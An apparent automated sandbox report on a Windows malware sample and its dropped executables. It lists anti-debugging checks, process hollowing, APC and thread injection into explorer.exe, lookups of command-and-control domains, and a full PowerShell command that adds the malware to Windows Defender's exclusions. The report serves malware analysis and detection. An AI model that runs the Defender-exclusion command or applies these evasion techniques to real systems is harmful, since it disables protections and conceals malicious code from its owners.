Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB695F0 mov ecx, dword ptr fs:[00000030h] 20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB995EC mov eax, dword ptr fs:[00000030h] 20_2_6AB995EC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB615C1 mov eax, dword ptr fs:[00000030h] 20_2_6AB615C1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC13D40 mov eax, dword ptr fs:[00000030h] 20_2_6AC13D40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h] 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h] 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h] 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6AD30 mov eax, dword ptr fs:[00000030h] 20_2_6AB6AD30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F51D mov eax, dword ptr fs:[00000030h] 20_2_6AB6F51D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8C577 mov eax, dword ptr fs:[00000030h] 20_2_6AB8C577
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8C577 mov eax, dword ptr fs:[00000030h] 20_2_6AB8C577
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB87D50 mov eax, dword ptr fs:[00000030h] 20_2_6AB87D50
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38D34 mov eax, dword ptr fs:[00000030h] 20_2_6AC38D34
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA3D43 mov eax, dword ptr fs:[00000030h] 20_2_6ABA3D43
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6354C mov eax, dword ptr fs:[00000030h] 20_2_6AB6354C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6354C mov eax, dword ptr fs:[00000030h] 20_2_6AB6354C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3540 mov eax, dword ptr fs:[00000030h] 20_2_6ABE3540
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C30D90 mov eax, dword ptr fs:[00000030h] 24_2_02C30D90
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C3092B mov eax, dword ptr fs:[00000030h] 24_2_02C3092B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\iwbavbe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426440
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB96B90 rdtsc 20_2_6AB96B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 13_1_004026C8 LdrLoadDll, 13_1_004026C8
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426440
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D1B0
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 10_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00426440
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 10_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0041D1B0
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 11_2_00420A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00420A60
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 11_2_0041D2F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0041D2F0
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 21_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_00426440
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 21_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_0041D1B0

HIPS / PFW / Operating System Protection Evasion:

barindex
Early bird code injection technique detected
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\31F4.exe Jump to behavior
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: iwbavbe.6.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Memory written: C:\Users\user\AppData\Local\Temp\31F4.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Memory written: C:\Users\user\AppData\Local\Temp\31F4.exe base: 400000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Thread created: C:\Windows\explorer.exe EIP: 44E1920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Thread created: unknown EIP: 4E51920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Thread created: unknown EIP: 4F819C0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Thread created: unknown EIP: 6871920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\69B.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41C000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41E000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: C8F008 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\31F4.exe Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 25_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 20_2_6AB9E730
Source: explorer.exe, 00000006.00000000.725317869.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.700663626.0000000005E50000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\69B.exe Queries volume information: C:\Users\user\AppData\Local\Temp\69B.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1254.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\31F4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3C84.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9415.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
